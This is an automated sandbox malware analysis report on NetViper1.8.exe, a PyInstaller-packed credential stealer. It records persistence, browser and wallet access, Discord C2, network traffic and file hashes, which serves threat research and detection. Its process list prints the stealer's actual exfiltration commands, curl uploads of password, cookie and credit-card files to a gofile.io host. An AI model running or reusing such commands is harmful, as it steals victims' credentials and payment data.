Malware Analysis Report

2025-05-05 21:13

Sample ID 240626-pcaq6atfqh
Target NetViper1.8.exe
SHA256 883ee8ebbd9c6d9278628fb2a240a5e05640e032281a5b04742ad55a00f244cc
Tags
pyinstaller spyware stealer
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

883ee8ebbd9c6d9278628fb2a240a5e05640e032281a5b04742ad55a00f244cc

Threat Level: Shows suspicious behavior

The file NetViper1.8.exe was found to be: Shows suspicious behavior.

Malicious Activity Summary

pyinstaller spyware stealer

Drops startup file

Reads user/profile data of web browsers

Loads dropped DLL

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Detects Pyinstaller

Unsigned PE

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-26 12:10

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-26 12:10

Reported

2024-06-26 12:11

Platform

win10v2004-20240226-es

Max time kernel

27s

Max time network

37s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe"

Signatures

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetViper1.8.exe C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{14DBCCD9-270B-4085-9925-1463F6D09727} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2528 wrote to memory of 992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 5080 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 5080 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 864 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 864 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 864 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 864 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 864 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 864 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 864 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 864 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 864 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe

"C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x23c,0x240,0x244,0x238,0x214,0x7ffa6c362e98,0x7ffa6c362ea4,0x7ffa6c362eb0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2568 --field-trial-handle=2572,i,5166390523967795314,1584889435232954462,262144 --variations-seed-version /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=es --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3004 --field-trial-handle=2572,i,5166390523967795314,1584889435232954462,262144 --variations-seed-version /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=es --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3288 --field-trial-handle=2572,i,5166390523967795314,1584889435232954462,262144 --variations-seed-version /prefetch:8

C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe

"C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=es --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4332 --field-trial-handle=2572,i,5166390523967795314,1584889435232954462,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=es --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4332 --field-trial-handle=2572,i,5166390523967795314,1584889435232954462,262144 --variations-seed-version /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store4.gofile.io/uploadFile

Network

Country Destination Domain Proto
GB 142.250.200.14:443 tcp
US 13.107.6.158:443 tcp
GB 216.58.201.97:443 tcp
GB 142.250.200.10:443 tcp
GB 88.221.134.17:443 tcp
GB 92.123.128.143:443 tcp
GB 13.87.96.169:443 tcp
GB 51.140.244.186:443 tcp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 80.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 update.googleapis.com udp
US 8.8.8.8:53 update.googleapis.com udp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
GB 216.58.204.67:443 update.googleapis.com tcp
US 13.107.246.64:443 edge-mobile-static.azureedge.net tcp
US 8.8.8.8:53 67.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 rentry.co udp
US 104.26.3.16:443 rentry.co tcp
US 104.26.3.16:443 rentry.co tcp
US 104.26.3.16:443 rentry.co tcp
US 104.26.3.16:443 rentry.co tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp
US 8.8.8.8:53 16.3.26.104.in-addr.arpa udp
US 8.8.8.8:53 api.gofile.io udp
FR 51.38.43.18:443 api.gofile.io tcp
US 8.8.8.8:53 geolocation-db.com udp
DE 159.89.102.253:443 geolocation-db.com tcp
US 8.8.8.8:53 205.12.26.104.in-addr.arpa udp
US 8.8.8.8:53 18.43.38.51.in-addr.arpa udp
US 8.8.8.8:53 253.102.89.159.in-addr.arpa udp
US 8.8.8.8:53 store4.gofile.io udp
FR 31.14.70.245:443 store4.gofile.io tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 245.70.14.31.in-addr.arpa udp
US 8.8.8.8:53 232.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
FR 31.14.70.245:443 store4.gofile.io tcp
FR 31.14.70.245:443 store4.gofile.io tcp
FR 31.14.70.245:443 store4.gofile.io tcp
US 8.8.8.8:53 74.90.14.23.in-addr.arpa udp
FR 31.14.70.245:443 store4.gofile.io tcp
FR 31.14.70.245:443 store4.gofile.io tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 525c4a9fdc618cd8a7f345689d08fb7c
SHA1 c487a4a9f88bd8fd614149b8c75e02550ecf1656
SHA256 95ba14b240994c57557c8388e98cb113cfcac940f21f51ca3292237b1ceba5d6
SHA512 8a1a1b30c4d61529baf7ad4edd0630ce01b7304d6c6ff10162dd437e0c1f9a374b58786ad003385ec6a5a789d179b7d4be7ee37246ba949d66fbc0bf39c08a7a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 d0b16232b231ba6263e88a780964c022
SHA1 14dd2855df7cab4093162fe7e4929e43a618937d
SHA256 8dbbebf149461bbc8061d0288804233a5678e72ade1fc59a252c50db250e551d
SHA512 e1fe4b353ada72008b3b4fa3d2c8e07767b1d844bdf2c50b78d7f4a025d902ae6383612eb32f81a6fe0ea0e9514433f01a500f483a0c4b5b22b8078479c9b42f

\??\pipe\crashpad_2528_MWOPUPVIFFILMODG

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\_MEI27042\ucrtbase.dll

MD5 d40325e6c994228a3403f8ba8f24601f
SHA1 6266b5dc2001ffd75da3588dd7c43027a706589d
SHA256 a2ab58e44828009f6dafe54dd5ed57edfa6b09641e3c8eaa473b37e5b0e2b862
SHA512 59e712713d6492fa1b002da34bc9db82a85e19d13b694b77b57db1030681432c41705d56e9f75031ed9522d43a344d1475c745af7c8c92f70f7fc78e8b8895f9

C:\Users\Admin\AppData\Local\Temp\_MEI27042\python312.dll

MD5 d521654d889666a0bc753320f071ef60
SHA1 5fd9b90c5d0527e53c199f94bad540c1e0985db6
SHA256 21700f0bad5769a1b61ea408dc0a140ffd0a356a774c6eb0cc70e574b929d2e2
SHA512 7a726835423a36de80fb29ef65dfe7150bd1567cac6f3569e24d9fe091496c807556d0150456429a3d1a6fd2ed0b8ae3128ea3b8674c97f42ce7c897719d2cd3

C:\Users\Admin\AppData\Local\Temp\_MEI27042\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\AppData\Local\Temp\_MEI27042\base_library.zip

MD5 43935f81d0c08e8ab1dfe88d65af86d8
SHA1 abb6eae98264ee4209b81996c956a010ecf9159b
SHA256 c611943f0aeb3292d049437cb03500cc2f8d12f23faf55e644bca82f43679bc0
SHA512 06a9dcd310aa538664b08f817ec1c6cfa3f748810d76559c46878ea90796804904d41ac79535c7f63114df34c0e5de6d0452bb30df54b77118d925f21cfa1955

C:\Users\Admin\AppData\Local\Temp\_MEI27042\_ctypes.pyd

MD5 fb454c5e74582a805bc5e9f3da8edc7b
SHA1 782c3fa39393112275120eaf62fc6579c36b5cf8
SHA256 74e0e8384f6c2503215f4cf64c92efe7257f1aec44f72d67ad37dc8ba2530bc1
SHA512 727ada80098f07849102c76b484e9a61fb0f7da328c0276d82c6ee08213682c89deeb8459139a3fbd7f561bffaca91650a429e1b3a1ff8f341cebdf0bfa9b65d

C:\Users\Admin\AppData\Local\Temp\_MEI27042\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
